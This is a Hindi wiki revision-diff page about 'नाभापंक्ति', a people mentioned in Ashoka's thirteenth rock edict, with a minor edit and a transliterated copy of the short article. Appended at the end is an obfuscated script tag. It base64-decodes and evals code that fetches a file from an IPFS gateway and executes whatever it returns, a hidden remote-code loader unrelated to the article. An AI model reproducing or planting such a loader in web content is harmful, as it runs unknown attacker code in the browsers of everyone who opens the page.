Difference between revisions of "नाभापंक्ति"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
*'''नाभापंक्ति''' का उल्लेख [[अशोक]] के [[अशोक के शिलालेख|तेरहवें शिलालेख]] में हुआ है, परंतु उसकी ठीक पहचान नहीं हो सकी है।  
+
'''नाभापंक्ति''' का उल्लेख [[अशोक]] के [[अशोक के शिलालेख|तेरहवें शिलालेख]] में हुआ है, परंतु उसकी ठीक पहचान नहीं हो सकी है।  
 
*अभिलेख की अन्य प्रतियों में उन्हें '''नाभक''' और '''नाभिति''' भी कहा गया है।  
 
*अभिलेख की अन्य प्रतियों में उन्हें '''नाभक''' और '''नाभिति''' भी कहा गया है।  
 
*भण्डारकर महोदय का मत था कि वे उत्तर पश्चिमी सीमांत प्रदेश और [[भारत]] के पश्चिमी तट के बीच निवास करते थे।<ref>डी.आर. भण्डारकर कृत अशोक पृ. 33</ref>
 
*भण्डारकर महोदय का मत था कि वे उत्तर पश्चिमी सीमांत प्रदेश और [[भारत]] के पश्चिमी तट के बीच निवास करते थे।<ref>डी.आर. भण्डारकर कृत अशोक पृ. 33</ref>
{{लेख प्रगति|आधार=आधार1|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
+
{{लेख प्रगति|आधार= |प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
{{संदर्भ ग्रंथ}}
+
 
 
==टीका टिप्पणी और संदर्भ==   
 
==टीका टिप्पणी और संदर्भ==   
 
<references/>
 
<references/>

Latest revision as of 09:40, 18 August 2012

nabhapankti ka ullekh ashok ke terahavean shilalekh mean hua hai, parantu usaki thik pahachan nahian ho saki hai.

  • abhilekh ki any pratiyoan mean unhean nabhak aur nabhiti bhi kaha gaya hai.
  • bhandarakar mahoday ka mat tha ki ve uttar pashchimi simaant pradesh aur bharat ke pashchimi tat ke bich nivas karate the.[1]
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. di.ar. bhandarakar krit ashok pri. 33

bhattachary, sachidanand bharatiy itihas kosh (hiandi). lakhanoo: uttarapradesh hiandi sansthan, 220-221.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>